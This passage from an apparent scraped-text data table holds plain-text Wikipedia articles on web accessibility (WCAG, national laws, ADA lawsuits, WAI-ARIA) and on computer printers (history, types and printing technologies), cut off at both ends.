to stop or slow a bot. Some techniques include: |
302 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_accessibility | Web accessibility, or eAccessibility, 1 is the inclusive practice of ensuring there are no barriers that prevent interaction with, or access to, websites on the World Wide Web by people with physical disabilities, situational disabilities, and socio-economic restrictions on bandwidth and speed. When sites are correctly designed, developed and edited, more users have equal access to information and functionality. For example, when a site is coded with semantically meaningful HTML, with textual equivalents provided for images and with links named meaningfully, this helps blind users using text-to-speech software and or text-to-Braille hardware. When text and images are large and or enlargeable, it is easier for users with poor sight to read and understand the content. When links are underlined (or otherwise differentiated) as well as colored, this ensures that color blind users will be able to notice them. When clickable links and areas are large, this helps users who cannot control a mouse with precision. When pages are not coded in a way that hinders navigation by means of the keyboard alone, or a single switch access device alone, this helps users who cannot use a mouse or even a standard keyboard. When videos are closed captioned, chaptered, or a sign language version is available, deaf and hard-of-hearing users can understand the video. When flashing effects are avoided or made optional, users prone to seizures caused by these effects are not put at risk. And when content is written in plain language and illustrated with instructional diagrams and animations, users with dyslexia and learning difficulties are better able to understand the content. When sites are correctly built and maintained, all of these users can be accommodated without decreasing the usability of the site for non-disabled users. The needs that web accessibility aims to address include: Accessibility is not confined to the list above, rather it extends to anyone who is experiencing any permanent, temporary or situational disability. Situational disability refers to someone who may be experiencing a boundary based on the current experience. For example, a person may be situationally one-handed if they are carrying a baby. Web accessibility should be mindful of users experiencing a wide variety of barriers. According to a 2018 WebAIM global survey of web accessibility practitioners, close to 93% of survey respondents received no formal schooling on web accessibility. 3 Individuals living with a disability use assistive technologies such as the following to enable and assist web browsing: In 1999 the Web Accessibility Initiative, a project by the World Wide Web Consortium (W3C), published the Web Content Accessibility Guidelines WCAG 1.0. On 11 December 2008, the WAI released the WCAG 2.0 as a Recommendation. WCAG 2.0 aims to be up to date and more technology neutral. Though web designers can choose either standard to follow, the WCAG 2.0 have been widely accepted as the definitive guidelines on how to create accessible websites. Governments are steadily adopting the WCAG 2.0 as the accessibility standard for their own websites. 4 In 2012, the Web Content Accessibility Guidelines were also published as an ISO IEC standard: "ISO IEC 40500:2012: Information technology W3C Web Content Accessibility Guidelines (WCAG) 2.0". 5 In 2018, the WAI released the WCAG 2.1 Recommendation that extends WCAG 2.0. 6 There has been some criticism of the W3C process, claiming that it does not sufficiently put the user at the heart of the process. 7 There was a formal objection to WCAG's original claim that WCAG 2.0 will address requirements for people with learning disabilities and cognitive limitations headed by Lisa Seeman and signed by 40 organizations and people. 8 In articles such as "WCAG 2.0: The new W3C guidelines evaluated", 9 "To Hell with WCAG 2.0" 10 and "Testability Costs Too Much", 11 the WAI has been criticised for allowing WCAG 1.0 to get increasingly out of step with today's technologies and techniques for creating and consuming web content, for the slow pace of development of WCAG 2.0, for making the new guidelines difficult to navigate and understand, and other argued failings. The accessibility of websites relies on the cooperation of several components: 12 Web developers usually use authoring tools and evaluation tools to create web content. People ("users") use web browsers, media players, assistive technologies or other "user agents" to get and interact with the content. 12 Because of the growth in internet usage 18 and its growing importance in everyday life, countries around the world are addressing digital access issues through legislation. One approach is to protect access to websites for people with disabilities by using existing human or civil rights legislation. Some countries, like the U.S., protect access for people with disabilities through the technology procurement process. 19 It is common for nations to support and adopt the Web Content Accessibility Guidelines (WCAG) 2.0 by referring to the guidelines in their legislation. 20 21 Compliance with web accessibility guidelines is a legal requirement primarily in North America, Europe, parts of South America and parts of Asia. 22 Argentina Law 26.653 on Accessibility to Information on Web Pages. 23 Approved by the National Congress of Argentina on November 3, 2010. It specifies in its Article 1 that both the National State and its decentralized organisms or those companies that are related in any way with public services or goods, must respect the rules and requirements on accessibility in the design of their web pages. The objective is to facilitate access to contents to all persons with disabilities, in order to guarantee equal opportunities in relation to access to information and to avoid discrimination. In addition, by Decree 656 2019 24 the regulation of the aforementioned Law No. 26,653 is approved and it is reported that the authority in charge of its application will be the ONTI, "Oficina Nacional de Tecnolog as de Informaci n" (National Office of Information Technologies). 25 This agency is in charge of assisting and or advising the individuals and legal entities reached by this Law; in addition to disseminating, approving updating and also controlling the fulfillment of the accessibility standards and requirements of the web pages; among other functions. In 2000, an Australian blind man won a $20,000 court case against the Sydney Organising Committee of the Olympic Games (SOCOG). 26 This was the first successful case under Disability Discrimination Act 1992 because SOCOG had failed to make their official website, Sydney Olympic Games, adequately accessible to blind users. The Human Rights and Equal Opportunity Commission (HREOC) also published World Wide Web Access: Disability Discrimination Act Advisory Notes. 27 All Governments in Australia also have policies and guidelines that require accessible public websites. In Brazil, the federal government published a paper with guidelines for accessibility on 18 January 2005, for public reviewing. On 14 December of the same year, the second version was published, including suggestions made to the first version of the paper. On 7 May 2007, the accessibility guidelines of the paper became compulsory to all federal websites. The current version of the paper, which follows the WCAG 2.0 guidelines, is named e-MAG, Modelo de Acessibilidade de Governo Eletr nico (Electronic Government Accessibility Model), and is maintained by Brazilian Ministry of Planning, Budget, and Management. The paper can be viewed and downloaded at its official website. 28 In 2011, the Government of Canada began phasing in the implementation of a new set of web standards that are aimed at ensuring government websites are accessible, usable, interoperable and optimized for mobile devices. These standards replace Common Look and Feel 2.0 (CLF 2.0) Standards for the Internet. The first of these four standards, Standard on Web Accessibility 29 came into full effect on 31 July 2013. The Standard on Web Accessibility follows the Web Content Accessibility Guidelines (WCAG) 2.0 AA, and contains a list of exclusions that is updated annually. It is accompanied by an explicit Assessment Methodology 30 that helps government departments comply. The government also developed the Web Experience Toolkit (WET), 31 a set of reusable web components for building innovative websites. The WET helps government departments build innovative websites that are accessible, usable and interoperable and therefore comply with the government's standards. The WET toolkit is open source and available for anyone to use. The three related web standards are: the Standard on Optimizing Websites and Applications for Mobile Devices, 32 the Standard on Web Usability 33 and the Standard on Web Interoperability. 34 In 2019 the Government of Canada passed the Accessible Canada Act. This builds on the on provincial legislation like the Accessibility for Ontarians with Disabilities Act, The Accessibility for Manitobans Act and the Nova Scotia Accessibility Act. In February 2014 a draft law was endorsed by the European Parliament stating that all websites managed by public sector bodies have to be made accessible to everyone. 35 A European Commission Communication on eAccessibility was published on 13 September 2005. 1 The commission's aim to "harmonise and facilitate the public procurement of accessible ICT products and services" was embedded in a mandate issued to CEN, CENELEC and ETSI in December 2005, reference M 376. 36 A mandate is a request for the drafting and adoption of a European standard or European standardisation deliverables issued to one or more of the European standardisation organisations. Mandates are usually accepted by the standardisation organisation because they are based on preliminary consultation, although technically the organisation is independent and has a right to decline the mandate. 37 The mandate also called for the development of an electronic toolkit for public procurers enabling them to have access to the resulting harmonised requirements. 38 The commission also noted that the harmonised outcome, while intended for public procurement purposes, might also be useful for procurement in the private sector. 38 : Section 2.3 On 26 October 2016, the European Parliament approved the Web Accessibility Directive, which requires that the websites and mobile apps of public sector bodies be accessible. The relevant accessibility requirements are described in the European standard EN 301 549 V3.2.1 (published by ETSI). EU member states were expected to bring into force by 23 September 2018 laws and regulations that enforce the relevant accessibility requirements. Some categories of websites and apps are excepted from the directive, for example "websites and mobile applications of public service broadcasters and their subsidiaries". 39 The European Commission's "Rolling Plan for ICT Standardisation 2017" notes that ETSI standard EN 301 549 V1.1.2 will need to be updated to add accessibility requirements for mobile applications and evaluation methodologies to test compliance with the standard. 40 In 2019 the European Union introduced the European Accessibility Act, as one of the leading pieces of legislation for digital accessibility and digital inclusion. The European Accessibility Act (EAA), which will enter into force on 28 June 2025, requiring companies to ensure that the newly marketed products and services covered by the Act are accessible. All websites will need to meet a minimum AA-level criterion. As of June 28, 2025, customers will be able to file complaints before national courts or authorities if services or products do not respect the new rules. 41 In India, National Informatics Centre (NIC), under Ministry of Electronics and Information Technology (MeitY) has passed Guidelines for Indian Government Websites (GIGW) 42 for government agencies in 2009, compelling them to adhere to WCAG 2.0 Level A standards. 43 Ministry of Electronics and Information Technology (MeitY) has National Policy on Universal Electronic Accessibility 44 clearly stated, Accessibility Standards and Guidelines be formulated or adapted from prevailing standards in the domain including World Wide Web Consortium accessibility Web standards and guidelines such as Authoring Tool Accessibility Guidelines (ATAG 45 ), Web Content Accessibility Guidelines (WCAG 2.0) and User Agent Accessibility Guidelines (UAAG 46 ). GIGW aims to ensure the quality and accessibility of government guidelines by offering guidance on desirable practices covering the entire lifecycle of websites, web portals and web applications, right from conceptualization and design to their development, maintenance and management. The Department of Administrative Reforms and Public Grievances made the same a part of the Central Secretariat Manual of Office Procedure. GIGW 3.0 47 also significantly enhances the guidance on the accessibility and usability of mobile apps, especially by offering specific guidance to government organizations on how to leverage public digital infrastructure devised for whole-of-government delivery of services, benefits and information. 48 The Rights of Persons with Disabilities Act, 2016 (RPwD) 49 passed in parliament. The law replaced earlier legislation and provided clearer guidance for digital accessibility. The RPwD Act, 106 through Sections 40 46 mandates accessibility to be ensured in all public-centric buildings, transportation systems, Information and Communication Technology (ICT) services, consumer products and all other services being provided by the Government or other service providers. 50 In Ireland, the Disability Act 2005 51 requires that where a public body communicates in electronic form with one or more persons, the contents of the communication must be, as far as practicable, "accessible to persons with a visual impairment to whom adaptive technology is available" (Section 28(2)). The National Disability Authority has produced a Code of Practice 52 giving guidance to public bodies on how to meet the obligations of the Act. This is an approved code of practice and its provisions have the force of legally binding statutory obligations. It states that a public body can achieve compliance with Section 28(2) by "reviewing existing practices for electronic communications in terms of accessibility against relevant guidelines and standards", giving the example of "Double A conformance with the Web Accessibility Initiative's (WAI) Web Content Accessibility Guidelines (WCAG) . The Israeli Ministry of Justice recently published regulations requiring Internet websites to comply with Israeli standard 5568, which is based on the W3C Web Content Accessibility Guidelines 2.0. The main differences between the Israeli standard and the W3C standard concern the requirements to provide captions and texts for audio and video media. The Israeli standards are somewhat more lenient, reflecting the current technical difficulties in providing such captions and texts in Hebrew. 53 In Italy, web accessibility is ruled by the so-called "Legge Stanca" (Stanca Act), formally Act n.4 of 9 January 2004, officially published on the Gazzetta Ufficiale on 17 January 2004. The original Stanca Act was based on the WCAG 1.0. On 20 March 2013 the standards required by the Stanca Act were updated to the WCAG 2.0. Web Content Accessibility Guidelines in Japan were established in 2004 as JIS (Japanese Industrial Standards) X 8341 3. JIS X 8341 3 was revised in 2010 as JIS X 8341 3:2010 to encompass WCAG 2.0, and it was revised in 2016 as JIS X 8341 3:2016 to be identical standards with the international standard ISO IEC 40500:2012. The Japanese organization WAIC (Web Accessibility Infrastructure Committee) has published the history and structure of JIS X 8341 3:2016. 54 In Malta Web Content Accessibility assessments were carried out by the Foundation for Information Technology Accessibility (FITA) since 2003. 55 Until 2018, this was done in conformance with the requirements of the Equal Opportunities Act (2000) CAP 43 and applied WACG guidelines. 56 With the advent of the EU Web Accessibility Directive the Malta Communications Authority was charged with ensuring the accessibility of online resources owned by Maltese public entities. 57 FITA continues to provide ICT accessibility assessments to public and commercial entities, applying standard EN301549 and WCAG 2.1 as applicable. Therefore, both the Equal Opportunities Act anti-discrimination legislation and the transposed EU Web Accessibility Directive are applicable to the Maltese scenario. In Norway, web accessibility is a legal obligation under the Act 20 June 2008 No 42 relating to a prohibition against discrimination on the basis of disability, also known as the Anti-discrimination Accessibility Act. The Act went into force in 2009, and the Ministry of Government Administration, Reform and Church Affairs Fornyings , administrasjons- og kirkedepartementet published the Regulations for universal design of information and communication technology (ICT) solutions Forskrift om universell utforming av informasjons- og kommunikasjonsteknologiske (IKT) l sninger in 2013. 58 The regulations require compliance with Web Content Accessibility Guidelines 2.0 (WCAG 2.0) NS ISO IEC 40500: 2012, level A and AA with some exceptions. 59 60 The Norwegian Agency for Public Management and eGovernment (Difi) is responsible for overseeing that ICT solutions aimed at the general public are in compliance with the legislative and regulatory requirements. 61 As part of the Web Accessibility Initiatives in the Philippines, the government through the National Council for the Welfare of Disabled Persons (NCWDP) board approved the recommendation of forming an ad hoc or core group of webmasters that will help in the implementation of the Biwako Millennium Framework set by the UNESCAP. The Philippines was also the place where the Interregional Seminar and Regional Demonstration Workshop on Accessible Information and Communications Technologies (ICT) to Persons with Disabilities was held where eleven countries from Asia Pacific were represented. The Manila Accessible Information and Communications Technologies Design Recommendations was drafted and adopted in 2003. In Spain, UNE 139803:2012 is the norm entrusted to regulate web accessibility. This standard is based on Web Content Accessibility Guidelines 2.0. 62 In Sweden, Verva, the Swedish Administrative Development Agency is responsible for a set of guidelines for Swedish public sector web sites. Through the guidelines, web accessibility is presented as an integral part of the overall development process and not as a separate issue. The Swedish guidelines contain criteria which cover the entire life cycle of a website; from its conception to the publication of live web content. These criteria address several areas which should be considered, including: An English translation was released in April 2008: Swedish National Guidelines for Public Sector Websites. 63 The translation is based on the latest version of Guidelines which was released in 2006. 64 In the UK, the Equality Act 2010 does not refer explicitly to website accessibility, but makes it illegal to discriminate against people with disabilities. The Act applies to anyone providing a service; public, private and voluntary sectors. The Code of Practice: Rights of Access Goods, Facilities, Services and Premises document 65 published by the government's Equality and Human Rights Commission to accompany the Act does refer explicitly to websites as one of the "services to the public" which should be considered covered by the Act. In December 2010 the UK released the standard BS 8878:2010 Web accessibility. Code of practice. This standard effectively supersedes PAS 78 (pub. 2006). PAS 78, produced by the Disability Rights Commission and usable by disabled people. The standard has been designed to introduce non-technical professionals to improved accessibility, usability and user experience for disabled and older people. 66 It will be especially beneficial to anyone new to this subject as it gives guidance on process, rather than on technical and design issues. BS 8878 is consistent with the Equality Act 2010 67 and is referenced in the UK government's e-Accessibility Action Plan as the basis of updated advice on developing accessible online services. It includes recommendations for: BS 8878 is intended for anyone responsible for the policies covering web product creation within their organization, and governance against those policies. It additionally assists people responsible for promoting and supporting equality and inclusion initiatives within organizations and people involved in the procurement, creation or training of web products and content. A summary of BS 8878 68 is available to help organisations better understand how the standard can help them embed accessibility and inclusive design in their business-as-usual processes. On 28 May 2019, BS 8878 was superseded by ISO 30071 1, the international Standard that built on BS 8878 and expanded it for international use. A summary of how ISO 30071 1 relates to BS 8878 69 is available to help organisations understand the new Standard. On April 9, National Rail replaced its blue and white aesthetic with a black and white theme, which was criticized for not conforming to the Web Content Accessibility Guidelines. The company restored the blue and white theme and said it is investing in modernising its website in accords to the latest accessibility guidelines. 70 In 2019 new accessibility regulations 71 72 came into force setting a legal duty for public sector bodies to publish accessibility statements and make their websites accessible by 23 September 2020 73 Accessibility statements include information about how the website was tested and the organisation's plan to fix any accessibility problems. Statements should be published and linked to on every page on the website. 74 In the United States, Section 508 Amendment to the Rehabilitation Act of 1973 requires all Federal agencies' electronic and information technology to be accessible to those with disabilities. Both members of the public and federal employees have the right to access this technology, such as computer hardware and software, websites, phone systems, and copiers. 75 Also, Section 504 of the Rehabilitation Act prohibits discrimination on the basis of disability for entities receiving federal funds and has been cited in multiple lawsuits against organizations such as hospitals that receive federal funds through medicare medicaid. In addition, Title III of the Americans with Disabilities Act (ADA) prohibits discrimination on the basis of disability. There is some debate on the matter; multiple courts and the U.S. Department of Justice have taken the position that the ADA requires website and app operators and owners to take affirmative steps to make their websites and apps accessible to disabled persons and compatible with common assistive technologies such as the JAWS screen reader, while other courts have taken the position that the ADA does not apply online. The U.S. Department of Justice has endorsed the WCAG2.0AA standard as an appropriate standard for accessibility in multiple settlement agreements. 76 Numerous lawsuits challenging websites and mobile apps on the basis of the ADA have been filed since 2017. These cases appears spurred by a 2017 case, Gil v. Winn Dixie Stores, in which a federal court in Florida ruled that Winn Dixie's website must be accessible. Around 800 cases related to web accessibility were filed in 2017, and over 2,200 were filed in 2018. Additionally, though the Justice Department had stated in 2010 that they would publish guidelines for web accessibility, they reversed this plan in 2017, also spurring legal action against inaccessible sites. 77 A notable lawsuit related to the ADA was filed against Domino's Pizza by a blind user who could not use Domino's mobile app. At the federal district level, the court ruled in favor of Domino's as the Justice Department had not established the guidelines for accessibility, but this was appealed to the Ninth Circuit. The Ninth Circuit overruled the district court, ruling that because Domino's is a brick-and-mortar store, which must meet the ADA, and the mobile app an extension of their services, their app must also be compliant with the ADA. Domino's petitioned to the Supreme Court, backed by many other restaurants and retail chains, arguing that this decision impacts their Due Process since disabled customers have other, more accessible means to order. 77 In October 2019, the Supreme Court declined to hear the case, which effectively upheld the decision of the 9th Circuit Court and requires the case to be heard as it stands. 78 79 The number and cost of federal accessibility lawsuits has risen dramatically in the last few years. 80 A growing number of organizations, companies and consultants offer website accessibility audits. These audits, a type of system testing, identify accessibility problems that exist within a website, and provide advice and guidance on the steps that need to be taken to correct these problems. A range of methods are used to audit websites for accessibility: Each of these methods has its strengths and weaknesses: Ideally, a combination of methods should be used to assess the accessibility of a website. Once an accessibility audit has been conducted, and accessibility errors have been identified, the errors will need to be remediated in order to ensure the site is compliant with accessibility errors. The traditional way of correcting an inaccessible site is to go back into the source code, reprogram the error, and then test to make sure the bug was fixed. If the website is not scheduled to be revised in the near future, that error (and others) would remain on the site for a lengthy period of time, possibly violating accessibility guidelines. Because this is a complicated process, many website owners choose to build accessibility into a new site design or re-launch, as it can be more efficient to develop the site to comply with accessibility guidelines, rather than to remediate errors later. With the progress in AI technology, web accessibility has become more accessible. With 3rd party add-ons that leverage AI and machine learning, it is possible to offer changes to the website design without altering the source code. This way, a website can be accessible to different types of users without the need to adjust the website for every accessibility equipment. 82 For a web page to be accessible all important semantics about the page's functionality must be available so that assistive technology can understand and process the content and adapt it for the user. However, as content becomes more and more complex, the standard HTML tags and attributes become inadequate in providing semantics reliably. Modern Web applications often apply scripts to elements to control their functionality and to enable them to act as a control or other dynamic component. These custom components or widgets do not provide a way to convey semantic information to the user agent. WAI-ARIA (Accessible Rich Internet Applications) is a specification 83 published by the World Wide Web Consortium that specifies how to increase the accessibility of dynamic content and user interface components developed with Ajax, HTML, JavaScript and related technologies. ARIA enables accessibility by enabling the author to provide all the semantics to fully describe its supported behaviour. It also allows each element to expose its current states and properties and its relationships between other elements. Accessibility problems with the focus and tab index are also corrected. |
303 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Printer_(computing) | In computing, a printer is a peripheral machine which makes a durable representation of graphics or text, usually on paper. 1 While most output is human-readable, bar code printers are an example of an expanded use for printers. 2 Different types of printers include 3D printers, inkjet printers, laser printers, and thermal printers. 3 The first computer printer designed was a mechanically driven apparatus by Charles Babbage for his difference engine in the 19th century; however, his mechanical printer design was not built until 2000. 4 The first patented printing mechanism for applying a marking medium to a recording medium or more particularly an electrostatic inking apparatus and a method for electrostatically depositing ink on controlled areas of a receiving medium, was in 1962 by C. R. Winston, Teletype Corporation, using continuous inkjet printing. The ink was a red stamp-pad ink manufactured by Phillips Process Company of Rochester, NY under the name Clear Print. This patent (US3060429) led to the Teletype Inktronic Printer product delivered to customers in late 1966. 5 The first compact, lightweight digital printer was the EP 101, invented by Japanese company Epson and released in 1968, according to Epson. 6 7 8 The first commercial printers generally used mechanisms from electric typewriters and Teletype machines. The demand for higher speed led to the development of new systems specifically for computer use. In the 1980s there were daisy wheel systems similar to typewriters, line printers that produced similar output but at much higher speed, and dot-matrix systems that could mix text and graphics but produced relatively low-quality output. The plotter was used for those requiring high-quality line art like blueprints. The introduction of the low-cost laser printer in 1984, with the first HP LaserJet, 9 and the addition of PostScript in next year's Apple LaserWriter set off a revolution in printing known as desktop publishing. 10 Laser printers using PostScript mixed text and graphics, like dot-matrix printers, but at quality levels formerly available only from commercial typesetting systems. By 1990, most simple printing tasks like fliers and brochures were now created on personal computers and then laser printed; expensive offset printing systems were being dumped as scrap. The HP Deskjet of 1988 offered the same advantages as a laser printer in terms of flexibility, but produced somewhat lower-quality output (depending on the paper) from much less-expensive mechanisms. Inkjet systems rapidly displaced dot-matrix and daisy-wheel printers from the market. By the 2000s, high-quality printers of this sort had fallen under the $100 price point and became commonplace. The rapid improvement of internet email through the 1990s and into the 2000s has largely displaced the need for printing as a means of moving documents, and a wide variety of reliable storage systems means that a "physical backup" is of little benefit today. Starting around 2010, 3D printing became an area of intense interest, allowing the creation of physical objects with the same sort of effort as an early laser printer required to produce a brochure. As of the 2020s, 3D printing has become a widespread hobby due to the abundance of cheap 3D printer kits, with the most common process being Fused deposition modeling. Personal printers are mainly designed to support individual users, and may be connected to only a single computer. These printers are designed for low-volume, short-turnaround print jobs, requiring minimal setup time to produce a hard copy of a given document. However, they are generally slow devices ranging from 6 to around 25 pages per minute (ppm), and the cost per page is relatively high. However, this is offset by the on-demand convenience. Some printers can print documents stored on memory cards or from digital cameras and scanners. Networked or shared printers are "designed for high-volume, high-speed printing". They are usually shared by many users on a network and can print at speeds of 45 to around 100 ppm. The Xerox 9700 could achieve 120 ppm. An ID Card printer is used for printing plastic ID cards. These can now be customised with important features such as holographic overlays, HoloKotes and watermarks. citation needed This is either a direct to card printer (the more feasible option, or a retransfer printer. citation needed A virtual printer is a piece of computer software whose user interface and API resembles that of a printer driver, but which is not connected with a physical computer printer. A virtual printer can be used to create a file which is an image of the data which would be printed, for archival purposes or as input to another program, for example to create a PDF or to transmit to another system or user. A barcode printer is a computer peripheral for printing barcode labels or tags that can be attached to, or printed directly on, physical objects. Barcode printers are commonly used to label cartons before shipment, or to label retail items with UPCs or EANs. A 3D printer is a device for making a three-dimensional object from a 3D model or other electronic data source through additive processes in which successive layers of material (including plastics, metals, food, cement, wood, and other materials) are laid down under computer control. It is called a printer by analogy with an inkjet printer which produces a two-dimensional document by a similar process of depositing a layer of ink on paper. A card printer is an electronic desktop printer with single card feeders which print and personalize plastic cards. In this respect they differ from, for example, label printers which have a continuous supply feed. Card dimensions are usually 85.60 53.98 mm, standardized under ISO IEC 7810 as ID 1. This format is also used in EC-cards, telephone cards, credit cards, driver's licenses and health insurance cards. This is commonly known as the bank card format. Card printers are controlled by corresponding printer drivers or by means of a specific programming language. Generally card printers are designed with laminating, striping, and punching functions, and use desktop or web-based software. The hardware features of a card printer differentiate a card printer from the more traditional printers, as ID cards are usually made of PVC plastic and require laminating and punching. Different card printers can accept different card thickness and dimensions. The principle is the same for practically all card printers: the plastic card is passed through a thermal print head at the same time as a color ribbon. The color from the ribbon is transferred onto the card through the heat given out from the print head. The standard performance for card printing is 300 dpi (300 dots per inch, equivalent to 11.8 dots per mm). There are different printing processes, which vary in their detail: Common printing problems Variations in card printers There are basically two categories of card printer software: desktop-based, and web-based (online). The biggest difference between the two is whether or not a customer has a printer on their network that is capable of printing identification cards. If a business already owns an ID card printer, then a desktop-based badge maker is probably suitable for their needs. Typically, large organizations who have high employee turnover will have their own printer. A desktop-based badge maker is also required if a company needs their IDs make instantly. An example of this is the private construction site that has restricted access. However, if a company does not already have a local (or network) printer that has the features they need, then the web-based option is a perhaps a more affordable solution. The web-based solution is good for small businesses that do not anticipate a lot of rapid growth, or organizations who either can not afford a card printer, or do not have the resources to learn how to set up and use one. Generally speaking, desktop-based solutions involve software, a database (or spreadsheet) and can be installed on a single computer or network. Alongside the basic function of printing cards, card printers can also read and encode magnetic stripes as well as contact and contact free RFID chip cards (smart cards). Thus card printers enable the encoding of plastic cards both visually and logically. Plastic cards can also be laminated after printing. Plastic cards are laminated after printing to achieve a considerable increase in durability and a greater degree of counterfeit prevention. Some card printers come with an option to print both sides at the same time, which cuts down the time taken to print and less margin of error. In such printers one side of id card is printed and then the card is flipped in the flip station and other side is printed. Alongside the traditional uses in time attendance and access control (in particular with photo personalization), countless other applications have been found for plastic cards, e.g. for personalized customer and members' cards, for sports ticketing and in local public transport systems for the production of season tickets, for the production of school and college identity cards as well as for the production of national ID cards. The choice of print technology has a great effect on the cost of the printer and cost of operation, speed, quality and permanence of documents, and noise. Some printer technologies do not work with certain types of physical media, such as carbon paper or transparencies. A second aspect of printer technology that is often forgotten is resistance to alteration: liquid ink, such as from an inkjet head or fabric ribbon, becomes absorbed by the paper fibers, so documents printed with liquid ink are more difficult to alter than documents printed with toner or solid inks, which do not penetrate below the paper surface. Cheques can be printed with liquid ink or on special cheque paper with toner anchorage so that alterations may be detected. 12 The machine-readable lower portion of a cheque must be printed using MICR toner or ink. Banks and other clearing houses employ automation equipment that relies on the magnetic flux from these specially printed characters to function properly. The following printing technologies are routinely found in modern printers: A laser printer rapidly produces high quality text and graphics. As with digital photocopiers and multifunction printers (MFPs), laser printers employ a xerographic printing process but differ from analog photocopiers in that the image is produced by the direct scanning of a laser beam across the printer's photoreceptor. Another toner-based printer is the LED printer which uses an array of LEDs instead of a laser to cause toner adhesion to the print drum. Inkjet printers operate by propelling variably sized droplets of liquid ink onto almost any sized page. They are the most common type of computer printer used by consumers. Solid ink printers, also known as phase-change ink or hot-melt ink printers, are a type of thermal transfer printer, graphics sheet printer or 3D printer . They use solid sticks, crayons, pearls or granular ink materials. Common inks are CMYK-colored ink, similar in consistency to candle wax, which are melted and fed into a piezo crystal operated print-head. A Thermal transfer printhead jets the liquid ink on a rotating, oil coated drum. The paper then passes over the print drum, at which time the image is immediately transferred, or transfixed, to the page. Solid ink printers are most commonly used as color office printers and are excellent at printing on transparencies and other non-porous media. Solid ink is also called phase-change or hot-melt ink was first used by Data Products and Howtek, Inc., in 1984. 13 Solid ink printers can produce excellent results with text and images. Some solid ink printers have evolved to print 3D models, for example, Visual Impact Corporation 14 of Windham, NH was started by retired Howtek employee, Richard Helinski whose 3D patents US4721635 and then US5136515 was licensed to Sanders Prototype, Inc., later named Solidscape, Inc. Acquisition and operating costs are similar to laser printers. Drawbacks of the technology include high energy consumption and long warm-up times from a cold state. Also, some users complain that the resulting prints are difficult to write on, as the wax tends to repel inks from pens, and are difficult to feed through automatic document feeders, but these traits have been significantly reduced in later models. This type of thermal transfer printer is only available from one manufacturer, Xerox, manufactured as part of their Xerox Phaser office printer line. Previously, solid ink printers were manufactured by Tektronix, but Tektronix sold the printing business to Xerox in 2001. A dye-sublimation printer (or dye-sub printer) is a printer that employs a printing process that uses heat to transfer dye to a medium such as a plastic card, paper, or canvas. The process is usually to lay one color at a time using a ribbon that has color panels. Dye-sub printers are intended primarily for high-quality color applications, including color photography; and are less well-suited for text. While once the province of high-end print shops, dye-sublimation printers are now increasingly used as dedicated consumer photo printers. Thermal printers work by selectively heating regions of special heat-sensitive paper. Monochrome thermal printers are used in cash registers, ATMs, gasoline dispensers and some older inexpensive fax machines. Colors can be achieved with special papers and different temperatures and heating rates for different colors; these colored sheets are not required in black-and-white output. One example is Zink (a portmanteau of "zero ink"). The following technologies are either obsolete, or limited to special applications though most were, at one time, in widespread use. Impact printers rely on a forcible impact to transfer ink to the media. The impact printer uses a print head that either hits the surface of the ink ribbon, pressing the ink ribbon against the paper (similar to the action of a typewriter), or, less commonly, hits the back of the paper, pressing the paper against the ink ribbon (the IBM 1403 for example). All but the dot matrix printer rely on the use of fully formed characters, letterforms that represent each of the characters that the printer was capable of printing. In addition, most of these printers were limited to monochrome, or sometimes two-color, printing in a single typeface at one time, although bolding and underlining of text could be done by "overstriking", that is, printing two or more impressions either in the same character position or slightly offset. Impact printers varieties include typewriter-derived printers, teletypewriter-derived printers, daisywheel printers, dot matrix printers, and line printers. Dot-matrix printers remain in common use 15 in businesses where multi-part forms are printed. An overview of impact printing 16 contains a detailed description of many of the technologies used. Several different computer printers were simply computer-controllable versions of existing electric typewriters. The Friden Flexowriter and IBM Selectric-based printers were the most-common examples. The Flexowriter printed with a conventional typebar mechanism while the Selectric used IBM's well-known "golf ball" printing mechanism. In either case, the letter form then struck a ribbon which was pressed against the paper, printing one character at a time. The maximum speed of the Selectric printer (the faster of the two) was 15.5 characters per second. The common teleprinter could easily be interfaced with the computer and became very popular except for those computers manufactured by IBM. Some models used a "typebox" that was positioned, in the X- and Y-axes, by a mechanism, and the selected letter form was struck by a hammer. Others used a type cylinder in a similar way as the Selectric typewriters used their type ball. In either case, the letter form then struck a ribbon to print the letterform. Most teleprinters operated at ten characters per second although a few achieved 15 CPS. Daisy wheel printers operate in much the same fashion as a typewriter. A hammer strikes a wheel with petals, the "daisy wheel", each petal containing a letter form at its tip. The letter form strikes a ribbon of ink, depositing the ink on the page and thus printing a character. By rotating the daisy wheel, different characters are selected for printing. These printers were also referred to as letter-quality printers because they could produce text which was as clear and crisp as a typewriter. The fastest letter-quality printers printed at 30 characters per second. The term dot matrix printer is used for impact printers that use a matrix of small pins to transfer ink to the page. 17 The advantage of dot matrix over other impact printers is that they can produce graphical images in addition to text; however the text is generally of poorer quality than impact printers that use letterforms (type). Dot-matrix printers can be broadly divided into two major classes: Dot matrix printers can either be character-based or line-based (that is, a single horizontal series of pixels across the page), referring to the configuration of the print head. In the 1970s and '80s, dot matrix printers were one of the more common types of printers used for general use, such as for home and small office use. Such printers normally had either 9 or 24 pins on the print head (early 7 pin printers also existed, which did not print descenders). There was a period during the early home computer era when a range of printers were manufactured under many brands such as the Commodore VIC 1525 using the Seikosha Uni-Hammer system. This used a single solenoid with an oblique striker that would be actuated 7 times for each column of 7 vertical pixels while the head was moving at a constant speed. The angle of the striker would align the dots vertically even though the head had moved one dot spacing in the time. The vertical dot position was controlled by a synchronized longitudinally ribbed platen behind the paper that rotated rapidly with a rib moving vertically seven dot spacings in the time it took to print one pixel column. 18 24 pin print heads were able to print at a higher quality and started to offer additional type styles and were marketed as Near Letter Quality by some vendors. Once the price of inkjet printers dropped to the point where they were competitive with dot matrix printers, dot matrix printers began to fall out of favour for general use. Some dot matrix printers, such as the NEC P6300, can be upgraded to print in color. This is achieved through the use of a four-color ribbon mounted on a mechanism (provided in an upgrade kit that replaces the standard black ribbon mechanism after installation) that raises and lowers the ribbons as needed. Color graphics are generally printed in four passes at standard resolution, thus slowing down printing considerably. As a result, color graphics can take up to four times longer to print than standard monochrome graphics, or up to 8 16 times as long at high resolution mode. Dot matrix printers are still commonly used in low-cost, low-quality applications such as cash registers, or in demanding, very high volume applications like invoice printing. Impact printing, unlike laser printing, allows the pressure of the print head to be applied to a stack of two or more forms to print multi-part documents such as sales invoices and credit card receipts using continuous stationery with carbonless copy paper. It also has security advantages as ink impressed into a paper matrix by force is harder to erase invisibly. Dot-matrix printers were being superseded even as receipt printers after the end of the twentieth century. Line printers print an entire line of text at a 